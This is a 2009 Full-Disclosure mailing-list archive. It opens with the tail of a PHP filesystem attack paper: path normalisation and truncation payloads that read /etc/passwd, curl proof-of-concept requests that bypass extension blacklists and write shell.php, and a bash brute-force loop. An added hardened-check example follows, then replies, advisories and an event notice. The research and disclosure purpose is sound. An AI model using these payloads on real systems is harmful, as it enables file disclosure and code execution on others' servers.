PHP 5.2.8-pl1-gentoo (cli) (built: Jan 21 2009 15:57:44)
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

DOESN'T WORK
$ strace php -r 'include("/etc/passwd/");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
write(1, "\nWarning: include(/etc/passwd/): "..., 103) = 103
Warning: include(/etc/passwd/): failed to open stream: Not a directory in Command line code on line 1

WORKS
$ strace php -r 'include("/etc/passwd/.");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

WORKS
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

WORKS
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

DOESN'T WORK
$ test="a/../../../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)

DOESN'T WORK
$ test="a/../../../../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Summary for "5.2.8-pl1-gentoo" without any patch:

- Appending / to a file does not work (while it will work for patched PHP versions, as shown below).
- Appending /. to a file works! Bypasses blacklist filters.
- Appending many / to a file doesn't work (while it will work for patched PHP versions, as shown below).
- Appending many /. to a file works! Bypasses blacklist filters and CAN be used for path truncation!
Test and analysis for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3":

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -v
PHP 5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3 (cli) (built: Jan 21 2009 15:19:02)
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies
    with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH

WORKS
$ strace php -r 'include("/etc/passwd/");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

WORKS
$ strace php -r 'include("/etc/passwd/.");'
lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0
lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0

DOESN'T WORK (2048 "/." tokens make 4096 bytes, which is too much, and Suhosin blocks it)
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
ALERT - Include filename ([OMIT]) is too long (attacker [OMIT]

WORKS! (Tweaked number of "/." tokens! Also note the absence of [lf]stat64 calls)
$ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory)
open("/etc/passwd", O_RDONLY) = 3

DOESN'T WORK
$ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory)

DOESN'T WORK
$ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc";
$ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");"
ALERT - Include filename ([OMIT]) is too long (attacker [OMIT]
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Summary for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3":

- Appending / to a file works! Bypasses blacklist filters.
- Appending /. to a file works! Bypasses blacklist filters.
- Appending many / to a file works! Bypasses blacklist filters but CAN'T be
  used for path truncation.
- Appending many /. to a file works! Bypasses blacklist filters and CAN be
  used for path truncation!

So our universal file truncation attack for PHP also works on Suhosin.

VIII) POC and attack code

- Blacklist extension check for reading

This POC will expose the bypass of a file viewer that blacklists certain
file extensions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This would normally not be exploitable, but with the techniques exposed
above it is.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ curl "http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php"
You are not allowed to see source files!
$ curl "http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php/."
[OMISSION, the application source, a quine!]
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

As you can see, appending the neutral "/." token successfully tricks the
check.

- Blacklist extension check for writing (online file editors, etc.)

This POC will expose the bypass of an online file editor that blacklists
certain file extensions.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Exploitation is similar to the previous POC.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ curl "http://localhost/poc_blacklist_bypass_edit.php" \
  -d "file=shell.php&text=antani"
You are not allowed to edit or create source files!

$ curl "http://localhost/poc_blacklist_bypass_edit.php" \
  -d "file=shell.php/.&text=antani"
6
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

By the way: six is the number of bytes written to "shell.php".

- Path truncation POC

We provide both a standard vulnerable page and an "attack" utility; tweak
the "TWEAK ME" line to use the payload of your choice.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ cat poc_path_truncation.php

$ cat poc_path_truncation.sh
#!/bin/bash
# Grow the "/." run one token per request until the appended suffix is
# truncated away and /etc/passwd gets included (visible as a "root:x" line).
url="http://localhost/poc_file_truncation.php?class=unexisting/../../../../../etc/passwd/."
n_iterations=3000
for ((repetitions=1; repetitions<=n_iterations; repetitions+=1)); do
  if curl -kis "$url" | grep -q "^root:x"; then
    echo -en "[$repetitions]"   # truncation reached at this length
  else
    echo -en "."
  fi
  url+="/."   # TWEAK ME
done
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

At a certain length (2019 on our test system) it should start printing
numbers inside square brackets; that means that /etc/passwd has been
successfully included.
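The PHP sources of the two blacklist POCs and of the truncation page did not survive this archive copy. As an added example (not the paper's own code), the block below puts a blacklist check of the kind those POCs defeat next to a check that holds, adds a fixed map in place of a user-controlled include(), and includes the include_path precondition from the earlier section (truncation only works with an absolute include_path entry). DOC_ROOT, ALLOWED_EXT, CLASS_MAP and the function names are assumptions; PHP 7.1 or later is assumed for the nullable return types.

```php
<?php
// Added example, not the paper's (stripped) POC code. Shows:
//  1. the include_path precondition for path truncation,
//  2. a blacklist check of the kind the read/edit POCs defeat,
//  3. a hardened check, and a fixed include map instead of include($user).
// DOC_ROOT, ALLOWED_EXT and CLASS_MAP are assumed values.
declare(strict_types=1);

const DOC_ROOT    = '/var/www/files';          // assumed base directory
const ALLOWED_EXT = ['txt', 'log', 'md'];       // allowlist, never a blacklist
const CLASS_MAP   = [                           // assumed include targets
    'user' => 'classes/User.class.php',
    'post' => 'classes/Post.class.php',
];

// 1. Precondition: truncation only works when include_path holds at least
//    one absolute entry (".:/usr/share/php" does, ".:" does not).
function includePathHasAbsoluteEntry(string $includePath): bool
{
    foreach (explode(PATH_SEPARATOR, $includePath) as $entry) {
        if ($entry !== '' && $entry[0] === '/') {
            return true;
        }
    }
    return false;
}

// 2. Vulnerable: tests the raw string, but PHP normalises "x.php/." to
//    "x.php" before opening it, so the suffix test never sees the real name.
function vulnerableIsAllowed(string $file): bool
{
    return !preg_match('/\.(php|phtml|inc)$/i', $file);
}

// Vulnerable include: user input becomes a path prefix, and a long "/."
// run truncates the ".class.php" suffix away (the paper's finding).
function vulnerableIncludeTarget(string $class): string
{
    return 'classes/' . $class . '.class.php';
}

// 3. Hardened: a file parameter must be one plain file name with an
//    allowlisted extension; anything containing a separator ("/", "\", NUL)
//    is refused, which kills "../", "/.", "./" and the truncation payloads.
function hardenedResolve(string $file): ?string
{
    if ($file === '' || strlen($file) > 80 || strpbrk($file, "/\\\0") !== false) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_-]+\.([A-Za-z0-9]{1,8})\z/', $file, $m)) {
        return null;
    }
    if (!in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        return null;
    }
    return DOC_ROOT . '/' . $file;
}

// Hardened include: the request selects a key, never a path fragment.
function hardenedIncludeTarget(string $class): ?string
{
    return CLASS_MAP[$class] ?? null;
}

// Demo over the paper's payloads (run with: php this_file.php).
foreach ([
    'notes.txt',
    'poc_blacklist_bypass_read.php',
    'poc_blacklist_bypass_read.php/.',                 // neutral "/." token
    'shell.php/.',                                     // write-side bypass
    '../../../../etc/passwd' . str_repeat('/.', 2048), // truncation length
] as $p) {
    printf("%-36.36s vulnerable=%-5s hardened=%s\n", $p,
        vulnerableIsAllowed($p) ? 'ALLOW' : 'deny',
        hardenedResolve($p) === null ? 'deny' : 'ALLOW');
}
printf("include_path %s: truncation %s\n", '.:/usr/share/php',
    includePathHasAbsoluteEntry('.:/usr/share/php') ? 'possible' : 'blocked');
$class = 'unexisting/../../etc/passwd/.';
printf("class=%s\n  vulnerable -> %s\n  hardened   -> %s\n", $class,
    vulnerableIncludeTarget($class), hardenedIncludeTarget($class) ?? 'refused');
```

The separator check is the load-bearing part: once "/" and "\" cannot appear in a file parameter at all, neither the Unix "/." token nor the Windows "./" and ".\" tokens discussed in the next section have anything to attach to, and the allowlist regex then decides on the name PHP will actually open rather than on a string that normalisation rewrites later. For includes, not building a path from the request at all is what removes the truncation attack, independently of include_path.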
- Windows path truncation POC

On Windows the universal path truncation token is "./" and not "/.".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This means that "file.est./././[OMIT]./.php" will work, while the already
seen "file.est/././[OMIT]././.php" will not. Please keep this in mind when
working with Windows machines. The tokenizer is defined as follows:

TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\"

Another payload that works for the truncation attack is ".\", but we weren't
able to find something equivalent to the "/etc/passwd/." trick on Unix.
Feel curious and want to spend more time on the issue? (-;

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

IX) Conclusions

Path normalization can be used for a number of goals, including blacklist
check bypass on isset, write and read filesystem operations, plus signature
evasion. Path truncation can be used in place of nullbyte poisoning, if an
include_path setting with absolute directories is present, in order to
achieve LFI (and RFI [5]) attacks.

X) References

[1] http://sla.ckers.org/forum/read.php?16,25706,25736#msg-25736
[2] http://pragmatk.blogspot.com/2009/01/lfi-fun.html
[3] http://pragmatk.blogspot.com/2009/01/lfi-fun-2.html
[4] http://www.ush.it/team/ush/hack-phpfs/log_ascii_kuza_07-04-08.txt
[5] http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
[6] http://verens.com/archives/2008/10/13/security-hole-for-files-with-a-dot-at-the-end/
    "I was reading the Apache source to try to spot the problem, and found
    the area where it happens - it's in the file "http/mod_mime.c". The
    function "find_ct()" extracts the extension for the server to use.
    Unfortunately, it ignores all extensions it does not understand, so
    it's not just a case of "test.php." being parsed as ".php", but also
    "test.php.fdabsfgdsahfj" and other similar rubbish files!"
[7] http://download.suhosin.org/suhosin-patch-5.2.8-0.9.6.3.patch.gz

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Credits (Out of band)

This article has been brought to you by the ush.it team. Francesco "ascii"
Ongaro and Giovanni "evilaliv3" Pellerano are the ones who spent most hours
on it, with the precious help of Antonio "s4tan" Parata, Stefano "Wisec"
Di Paola, Alex "kuza55", Alessandro "Jekil" Tanasi and many other friends.

A special greeting is for Florin "Slippery" Iamandi, a man behind, in one
way or another, many of the productions of ush.it.

Thanks everybody, you all make me feel at home!

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

Giovanni "evilaliv3" Pellerano
web site: http://www.evilaliv3.org/
mail: giovanni.pellerano AT evilaliv3 DOT org

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Legal Notices

Copyright (c) 2009 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without my express written consent. If you
wish to reprint the whole or any part of this alert in any other medium
other than electronically, please email me for permission.

Disclaimer: The information in the article is believed to be accurate at
the time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, this
information.

From dani at kachakil.com Sun Feb 8 13:28:27 2009
From: dani at kachakil.com (Daniel Kachakil)
Date: Sun, 8 Feb 2009 14:28:27 +0100
Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!)
References: <08BED96B74184FB588ABC2C7DBA89B23@DK>
Message-ID: <93B03C60951E44D0A394B0A04F871B50@DK>

Dear Paul:

Thanks for your comments. And yes, I think you are 100% right. The SFX-SQLi
"injection technique/method" (is there a better name for it?) will not help
you to extract more data than other existing techniques. The XMLSCHEMA
option is only an alternative way to get the column names (instead of using
SYSOBJECTS, for instance). Maybe it can also bypass some basic filters
(e.g. there is no need to use the WHERE clause), but this is secondary...

The main difference is this:

- Time-based SQL injection: 1 request -> 1/2 char using Deep Blind (but very slowly)
- Blind SQL injection: 1 request -> 1/7 char
- Union / error-based SQL injection: 1 request -> 1 field
- SFX-SQL injection: 1 request -> 1 table

So yes, this technique will extract the same data, but thousands of times
faster than other methods.

Regards,
Daniel Kachakil

--------------------------------------------------
From: "Paul Schmehl"
Sent: Sunday, February 08, 2009 5:10 AM
To:
Cc: "Daniel Kachakil"
Subject: Re: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!)

> --On February 7, 2009 10:02:21 AM -0600 Daniel Kachakil wrote:
>>
>> I have written a paper describing how the technique works and in which
>> fundamentals it is based, and I have also developed a tool which
>> implements this technique as a proof of concept (with the source code
>> included).
>>
>> You can get them through this URL:
>>
>> http://www.kachakil.com/papers/SFX-SQLi-en.htm
>
> Having read your paper, I'm a bit confused about what you think the "new
> SQL injection technique" is that you've discovered. I understand you have
> determined a way to *extract* data in a more compact and efficient format,
> but I didn't see any new *injection* technique. IOW, the FOR XML
> construct isn't going to assist you in obtaining the data - only in
> obtaining it more efficiently.
>
> Did I miss something?
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> ******************************************
> WARNING: Check the headers before replying

From stefan.esser at sektioneins.de Sun Feb 8 13:12:43 2009
From: stefan.esser at sektioneins.de (Stefan Esser)
Date: Sun, 08 Feb 2009 14:12:43 +0100
Subject: [Full-disclosure] PHP filesystem attack vectors
In-Reply-To: <498EB9A2.9030206@katamail.com>
References: <498EB9A2.9030206@katamail.com>
Message-ID: <498EDA4B.2060507@sektioneins.de>

Hello,

ascii wrote:
> PHP filesystem attack vectors
>
> Name             PHP filesystem attack vectors
> Systems Affected PHP and PHP+Suhosin

This research misses some information. It compares "vanilla PHP" to
"patched PHP" but that is not exactly true.

PHP + Suhosin replaces the system's realpath() with an own implementation
based on FreeBSD (+ some hardening). This means everything presented that
works against PHP + Suhosin should work against vanilla PHP when used on
FreeBSD, OS X, OpenBSD, ...

Additionally the research should be repeated with PHP 5.3-beta, because it
now does something very similar to Suhosin.

Stefan Esser

From jmm at debian.org Sun Feb 8 21:31:08 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 8 Feb 2009 22:31:08 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1718-1] New boinc packages fix validation bypass
Message-ID: <20090208213108.GA4978@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1718-1                  security at debian.org
http://www.debian.org/security/                           Moritz Muehlenhoff
February 08, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : boinc
Vulnerability  : incorrect API usage
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0126
Debian Bug     : 511521

It was discovered that the core client for the BOINC distributed computing
infrastructure performs incorrect validation of the return values of
OpenSSL's RSA functions.

For the stable distribution (etch), this problem has been fixed in
version 5.4.11-4+etch1.

For the upcoming stable distribution (lenny), this problem has been fixed
in version 6.2.14-3.

For the unstable distribution (sid), this problem has been fixed in
version 6.2.14-3.

We recommend that you upgrade your boinc packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for amd64, arm, i386, ia64, mips, mipsel,
powerpc, s390 and sparc.
Source archives: http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11.orig.tar.gz Size/MD5 checksum: 5561690 268c8f6f19d5def378e7d2fbacc2d4eb http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11-4+etch1.dsc Size/MD5 checksum: 1174 2d007ac10e6c4033363f8b0978ecfdfa http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11-4+etch1.diff.gz Size/MD5 checksum: 42159 8bf8d8b4fd9a7bb3963f1af4b3a6f6e0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 742302 510dc201af61610b050bc3380c9d100a http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 331738 3c03b02467d1295a41e228e887e35c8a http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 420030 693edd73e7f6565fcecdd4d4734c9331 arm architecture (ARM) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 405796 8eac0ee7ccb30f4cd5db1d98b6d6bad5 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 355172 5624689252e7f4a17ab7ddd7b32c323e http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 776070 0a548d55f73c61821276aa015f4e69bb i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 402674 be5f9b3f94890248963a8fdbc9471251 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 340560 935dd3f2c5c51d66dd77c698253458af http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 747016 7bc3304531f57ac1e667fba68fe16cd0 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 
552872 9c0053cf650774c12dedb80d6c0918c7 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 445946 46d0dae4d46304332138ea7ecdcc773e http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 827448 adb080334dd148ca08d831a1656d8e52 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 760244 640cd45d564c8428a9e301723e11bb6d http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 364418 84aa41b3259eebd66f21811ffd693856 http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 453980 3200f312a78a7fb1b179e88b3da12095 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 362924 a0b49bd7aa24c8b2c8ea8412413b7f8a http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 752698 cff499021e2c48bbca805f4e5ff74e07 http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 452180 88876196db57020ad9cfd8fa0d9fa781 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 746960 53a8fdb3b93f7a01951f646781939499 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 357802 88bb6361dc2a34729ef49b1bcfc6f86f http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 436526 ebde4d9b7fa9357250eac6edd058fbf2 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 405746 f428c0a13fae9d569e8bb4a27d8d2d30 
http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 733522 fc578aa93e65eae44b48457411f6eda3 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 340934 f23cc5421e73e3d548b936ac3f20b40f sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 424774 773aa13cb3453920cfed95d93d8d7070 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 339330 082502b633ae3d84aa3b87fdb0dbee40 http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 775476 5fa72e818fad34c6dda5a6fa6df99f0a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkmPTrAACgkQXm3vHE4uylrBNwCgkVXF05tMtB72Tr/8ki5aPUxO 6wgAoKKK3m2RkjTUIBbF7LJl7lJMJ9bN =uZvI -----END PGP SIGNATURE----- From rembrandt at jpberlin.de Sun Feb 8 23:51:03 2009 
From: rembrandt at jpberlin.de (rembrandt)
Date: Mon, 9 Feb 2009 00:51:03 +0100
Subject: [Full-disclosure] Netgear SSL312 Router - remote DoS
Message-ID: <20090209005103.36e108c2.rembrandt@jpberlin.de>

Attached to this e-Mail is an advisory related to the Netgear SSL312 VPN
router (probably other devices of Netgear are affected as well, but this
has not been tested).

The advisory can also be found at:
http://www.helith.net/txt/netgear_ssl312_remote_dos.txt

Dear Netgear Team:
Please consider working together with the OSVDB team to take care of all
known issues related to Netgear products, or to even just have working
contact data available.

Kind regards,
Rembrandt

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: netgear_ssl312_remote_dos.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/0164592a/attachment.txt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 833 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/0164592a/attachment.bin

From namn at bluemoon.com.vn Mon Feb 9 02:34:02 2009
From: namn at bluemoon.com.vn (Nam Nguyen)
Date: Mon, 9 Feb 2009 09:34:02 +0700
Subject: [Full-disclosure] [BMSA-2009-02] XML injection in PyBlosxom
Message-ID: <20090209093402.14561620.namn@bluemoon.com.vn>

BLUE MOON SECURITY ADVISORY 2009-02
===================================

:Title: XML Injection in PyBlosxom
:Severity: Low
:Reporter: Blue Moon Consulting
:Products: PyBlosxom v1.4.3
:Fixed in: --

Description
-----------

PyBlosxom is a lightweight file-based weblog system. The project started
as a Python clone of Blosxom but has since evolved into a beast of its
own. PyBlosxom focuses on three things: simplicity, extensibility, and
community.

In v1.4.3, PyBlosxom suffers an XML injection issue. This allows a
malicious user to insert arbitrary code into the XML output from
PyBlosxom.

The problem is with the Atom flavor. Its ``head.atom`` uses the
``$(url)`` and ``$url`` variables, in many places, that were not properly
escaped. Injection can be made by forcing PyBlosxom to use the Atom
flavor, such as ``http://host/path/%3Ccool%3E?flav=atom``. A tag
``<cool>`` is injected in such a URL.

Blue Moon Consulting has verified the bug in version 1.4.3. It is highly
likely that it also exists in older versions starting from 1.3.

Workaround
----------

Disable the Atom flavor by deleting the ``atom.flav`` directory.

Fix
---

Users of PyBlosxom are advised to contact the vendor directly for a
proper fix.

Disclosure
----------

Blue Moon Consulting adopts RFPolicy v2.0 in notifying vendors.

:Initial vendor contact:
    February 07, 2009: Initial contact sent to Will Guaraldi.
:Vendor response:
    February 07, 2009: Will replied PyBlosxom did not use XML, so there
    could be no XML injection bug.
:Further communication:
    February 07, 2009: Replied to Will that we did find such a bug.
    February 08, 2009: Will was skeptical about the bug but asked us to
    file it in the bug tracker anyway.
    February 08, 2009: We replied that filing a security bug in a public
    bug tracker was not our disclosure practice. We again stated our
    disclosure policy and asked Will to accept it before we could send
    him further details.
    February 08, 2009: Will said he would not make any agreement. We
    therefore decided to alert the public.
:Public disclosure:
    February 09, 2009
:Exploit code:
    No exploit code is needed.

Disclaimer
----------

The information provided in this advisory is provided "as is" without
warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. Your use of the
information on the advisory or materials linked from the advisory is at
your own risk. Blue Moon Consulting Co., Ltd reserves the right to change
or update this notice at any time.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 195 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/ceb8fc9f/attachment.bin

From majormal at pirate-radio.org Mon Feb 9 17:00:35 2009
From: majormal at pirate-radio.org (Major Malfunction)
Date: Mon, 09 Feb 2009 17:00:35 +0000
Subject: [Full-disclosure] London DEFCON DC4420 - February 2009 Meet - Thursday 12th
Message-ID: <49906133.30905@pirate-radio.org>

Following our supah successful January meet, where we actually ran out of
time because of the volume and quality of talks (or was it volume of
alcohol the speakers had imbibed?), this month we are going to limit the
talks to 30 minutes and the number of speaking slots to 3 so we have more
time for drinking/socialising in between...

The lineup this month is:

  The Current State of Wifi - Arhont
  The Life of a Security Manager - Chris Sumner
  Java Stack Smashing - Subere

There will also be a couple of workshops running in-between/after speakers:

  Data extraction via Firewire/demo - Guillaume
  Sneak preview of a $100 man-in-the-middle RFID protocol analyser -
  Major Malfunction (bring RFID tags!!!)

And, of course... if this is your first meet... YOU will be talking!

Where will all this take place?

Upstairs @ The Glassblower
